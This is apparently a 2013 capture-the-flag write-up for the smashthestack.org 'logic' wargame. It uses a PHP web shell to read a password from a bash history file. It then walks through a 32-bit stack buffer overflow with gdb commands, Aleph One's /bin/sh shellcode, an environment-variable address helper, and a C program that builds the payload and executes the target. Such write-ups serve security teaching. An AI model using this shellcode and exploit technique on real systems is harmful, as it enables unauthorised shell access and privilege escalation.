
@shouya
Created February 3, 2013 18:24
Having fun with smashthestack.org#logic

Level1

PHP backdoor (level1):

http://logic.smashthestack.org:8181/uploads/PHPJackal.php

From that web shell, run cat /home/level1/.bash_history and find the password inside.

Level2

There's an executable at /levels/level2/level2.

Find the password via strings ./level2: it's fsckmelogic.

Once that password is accepted, the program is called as ./level2 fsckmelogic XXXX; a long enough second argument XXXX overflows a stack buffer, and that is what we exploit.

Smash the stack under gdb ./level2 with:

run fsckmelogic $(perl -e 'print "A"x4200')

We see the stack has been smashed with As: the program crashes because the saved return address now reads 0x41414141, which is not a mapped address.

Then we have to find which four bytes of the input (the return address is four bytes on a 32-bit machine) end up in the saved return address. We binary-search by splitting the input into a run of As followed by a run of Bs and watching which bytes of the faulting address change:

run fsckmelogic $(perl -e 'print "A"x4100 . "B"x100')
run fsckmelogic $(perl -e 'print "A"x4150 . "B"x50')
run fsckmelogic $(perl -e 'print "A"x4125 . "B"x75')
run fsckmelogic $(perl -e 'print "A"x4115 . "B"x85')
run fsckmelogic $(perl -e 'print "A"x4110 . "B"x90')

This time we see the address change to 0x42424141: x86 is little-endian, so the two low bytes still come from the As at offsets 4108 and 4109 and the two high bytes from the Bs at offsets 4110 and 4111. There we go:

run fsckmelogic $(perl -e 'print "A"x4108 . "B"x4')

The address is now exactly the four Bs, 0x42424242, so the saved return address lies at offset 4108 of the second argument.

Then we need a shellcode, i.e. machine code that does what the following program does:

#include <unistd.h>

int main(void) {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);   /* replaces this process with a shell */
    return 0;
}

Here I use an existing one, from Aleph One's "Smashing The Stack For Fun And Profit" at http://insecure.org/stf/smashstack.html :

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"

Store it somewhere with a stable, findable address, such as an environment variable (the environment is copied onto the stack of every program started from this shell, so ./level2 will carry it too):

export SHELLCODE=$'\xeb\x1f\x5e\x89\x76...'

Then we need the address of that variable; a small helper prints where it lands in its own environment:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
	printf("%p\n", getenv("SHELLCODE"));   /* NULL if SHELLCODE is not exported */
	return 0;
}

It outputs something like: 0xbfffdc75

One caveat: that is the address in the helper's environment. The environment sits at the top of the stack, so the same variable can land a few bytes away in ./level2 when the program name or the environment differs (gdb itself adds variables such as LINES and COLUMNS). If the exploit doesn't land, step the address by a few bytes, or prefix the shellcode with NOPs (\x90) so an inexact address still slides into it.

Then we substitute this address of our hijack code for the saved return address of ./level2, written little-endian:

That is:

run fsckmelogic $(perl -e 'print "A"x4108 . "\x75\xdc\xff\xbf"')

Then we get a shell. Run id in it and we see we are now user level3; cat /home/level3/.pass to read the password.
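The whole level2 procedure in one program, as an added example that is not part of the gist: it reproduces the A/B probe value (0x42424141 at offset 4108), then goes one step beyond the binary search by using a cyclic pattern so a single crash value yields the offset directly, and finally builds the "A"x4108 + little-endian return address payload and can exec ./level2 with it. It assumes a 32-bit x86 target, the ./level2 path and the fsckmelogic password from the write-up; the crash value in step 2 is simulated by reading the pattern at the known offset rather than taken from gdb.

```c
/* Added example (not from the gist): offset finding and payload building
 * for the level2 overflow. Assumes a 32-bit little-endian x86 target,
 * ./level2 in the current directory and the password fsckmelogic. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Value a 32-bit little-endian register holds after the 4 bytes at
 * buf[off..off+3] are popped into it, i.e. what gdb shows as the bad EIP. */
uint32_t le32_at(const unsigned char *buf, size_t off) {
    return (uint32_t)buf[off] | (uint32_t)buf[off + 1] << 8 |
           (uint32_t)buf[off + 2] << 16 | (uint32_t)buf[off + 3] << 24;
}

/* Metasploit-style cyclic pattern "Aa0Aa1Aa2...": 3-byte groups, so every
 * 4-byte window is unique within the first 26*26*10*3 = 20280 bytes.
 * Returns the number of bytes written (no terminating NUL). */
size_t make_pattern(unsigned char *out, size_t len) {
    size_t n = 0;
    for (char u = 'A'; u <= 'Z'; u++)
        for (char l = 'a'; l <= 'z'; l++)
            for (char d = '0'; d <= '9'; d++) {
                const char grp[3] = { u, l, d };
                for (int i = 0; i < 3 && n < len; i++) out[n++] = grp[i];
                if (n >= len) return n;
            }
    return n;
}

/* Recover the offset of the saved return address from the crash value:
 * the first position where the pattern holds its 4 little-endian bytes.
 * Returns -1 if the value did not come from our input. */
long offset_of(const unsigned char *pat, size_t plen, uint32_t crash_eip) {
    unsigned char needle[4] = { crash_eip & 0xff, (crash_eip >> 8) & 0xff,
                                (crash_eip >> 16) & 0xff, (crash_eip >> 24) & 0xff };
    for (size_t i = 0; i + 4 <= plen; i++)
        if (memcmp(pat + i, needle, 4) == 0) return (long)i;
    return -1;
}

/* "A" x offset followed by the return address little-endian, NUL-terminated
 * so it can travel as an argv string. argv strings cannot contain a NUL, so
 * an address with a 0x00 byte (or a payload that does not fit) yields -1. */
long build_payload(size_t offset, uint32_t ret, unsigned char *out, size_t outsize) {
    if (offset + 4 + 1 > outsize) return -1;
    unsigned char le[4] = { ret & 0xff, (ret >> 8) & 0xff,
                            (ret >> 16) & 0xff, (ret >> 24) & 0xff };
    for (int i = 0; i < 4; i++)
        if (le[i] == 0) return -1;
    memset(out, 'A', offset);
    memcpy(out + offset, le, 4);
    out[offset + 4] = '\0';
    return (long)(offset + 4);
}

int main(int argc, char **argv) {
    unsigned char buf[4200];

    /* 1. The A/B probe from the write-up: "A"x4110 . "B"x90 gives EIP 0x42424141. */
    memset(buf, 'A', 4110);
    memset(buf + 4110, 'B', 90);
    printf("A/B probe EIP at offset 4108: %#x\n", (unsigned)le32_at(buf, 4108));

    /* 2. One crash with a cyclic pattern gives the offset directly (crash
     *    value simulated here by reading the pattern at the known offset). */
    size_t n = make_pattern(buf, sizeof buf);
    uint32_t eip = le32_at(buf, 4108);
    printf("pattern EIP %#x -> offset %ld\n", (unsigned)eip, offset_of(buf, n, eip));

    /* 3. Build the payload; with an address on the command line, run the target:
     *    ./exploit 0xbfffdc75  is  ./level2 fsckmelogic $(perl -e 'print "A"x4108 . "\x75\xdc\xff\xbf"') */
    uint32_t ret = argc > 1 ? (uint32_t)strtoul(argv[1], NULL, 0) : 0xbfffdc75u;
    long len = build_payload(4108, ret, buf, sizeof buf);
    if (len < 0) { fprintf(stderr, "unusable return address %#x\n", (unsigned)ret); return 1; }
    if (argc > 1) {
        execl("./level2", "./level2", "fsckmelogic", (char *)buf, (char *)NULL);
        perror("execl ./level2");
        return 1;
    }
    printf("payload: %ld bytes, last four %02x %02x %02x %02x\n", len,
           buf[len - 4], buf[len - 3], buf[len - 2], buf[len - 1]);
    return 0;
}
```

The NUL check in build_payload is the practical reason 0xbfffdc75 works as-is: every byte of it is non-zero, so the address survives the argv copy. An address such as 0x08048000 would be truncated at its first zero byte and needs a different delivery route.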
